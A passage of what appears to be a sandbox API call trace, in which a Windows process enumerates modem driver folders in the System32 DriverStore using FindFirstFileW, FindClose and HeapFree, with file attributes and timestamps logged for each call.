lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmadc.inf_amd64_neutral_62d6e6995428f9d0\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4938e062, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6711e191, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6711e191, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.989] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.989] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.989] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmagm64.inf_amd64_neutral_ef322a8cc2738a9b\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5023e02e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6bf5f562, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6bf5f562, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.990] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.990] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmags64.inf_amd64_neutral_e68956e24e287714\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50394c90, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6bfab822, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6bfab822, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.991] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.991] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmairte.inf_amd64_neutral_0feacd08cb9c7fe3\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x494265e3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x671442f2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x671442f2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.991] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa.inf_amd64_neutral_560c956da9bcd8f5\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x494beb64, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6716a452, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6716a452, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.997] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa3.inf_amd64_neutral_77e515342bd572cc\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x495c9506, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6716a452, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6716a452, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.997] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa4.inf_amd64_neutral_6e97842bb8d9e6a8\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496add48, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x671905b2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x671905b2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.998] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.998] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa5.inf_amd64_neutral_ea8128ac5da37eb9\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4976c429, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x671dc873, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x671dc873, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.998] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.998] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwat.inf_amd64_neutral_213e93b5ced8b0fe\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498049aa, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x672029d3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x672029d3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.999] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmar1.inf_amd64_neutral_b8ebf59556c3dbf0\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4989cf2b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67228b33, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67228b33, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.002] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmarch.inf_amd64_neutral_4261401e3170ebfb\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4995b60d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67274df4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67274df4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.002] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmarn.inf_amd64_neutral_fa693d8797766f49\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49a19cee, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6729af54, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6729af54, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.003] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.003] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmati.inf_amd64_neutral_ded8f26cdee953c3\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad83cf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x672e7215, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x672e7215, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.003] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.003] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmatm2k.inf_amd64_neutral_64a8fb018ead55a7\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49bbcc11, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x675226b9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x675226b9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.004] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.004] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaus.inf_amd64_neutral_5fa4270b9924b918\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49c55192, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6756e979, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6756e979, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.004] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.004] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmboca.inf_amd64_neutral_cc532ed7b3b5b5a9\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49d399d4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x677a9e1e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x677a9e1e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.005] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.005] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.005] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr002.inf_amd64_neutral_ce2134188ab21f59\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48c1db94, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66db21eb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66db21eb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.005] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.005] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.005] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr004.inf_amd64_neutral_ccf1bc353e588fe1\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48cdc276, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66dd834b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66dd834b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.006] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.006] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr005.inf_amd64_neutral_d140721f97061bba\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48d9a957, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66dfe4ac, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66dfe4ac, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.006] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.006] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr006.inf_amd64_neutral_40c76453575b1208\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48e59038, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66dfe4ac, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66dfe4ac, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.007] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.007] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.007] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr007.inf_amd64_neutral_91d259640bad7d26\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48f3d87a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e2460c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e2460c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.007] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.007] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.007] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr008.inf_amd64_neutral_2cedaac353c381da\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48ffbf5b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e4a76c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e4a76c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.008] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.008] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.008] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr00a.inf_amd64_neutral_aa4f0850ff03674e\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x490ba63d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e708cd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e708cd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.008] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.008] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.008] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbsb.inf_amd64_neutral_56a9f6bceeec7f72\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49e1e215, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x679e52c2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x679e52c2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.009] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.009] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbtmdm.inf_amd64_neutral_2e4da8629fc5904e\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39c712bb, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f6f97d0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f6f97d0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.009] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.009] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbug3.inf_amd64_neutral_7617862a9cc286da\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49eb6796, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a0b422, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a0b422, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.010] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbw561.inf_amd64_neutral_fe42c0ff14d5562b\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49f74e78, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a0b422, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a0b422, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.014] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.014] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmc26a.inf_amd64_neutral_547edd894d7c19d9\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a00d3f9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a31582, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a31582, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.014] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.014] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcdp.inf_amd64_neutral_170c11f3a6d3f0a8\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a0cbada, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a31582, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a31582, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.015] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.015] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcm28.inf_amd64_neutral_d3fa0f62d3d7cea1\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a1d647c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a7d843, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a7d843, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.015] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.015] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcodex.inf_amd64_neutral_9bb71004e7b8f7ae\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a2bacbe, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67ac9b03, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67ac9b03, 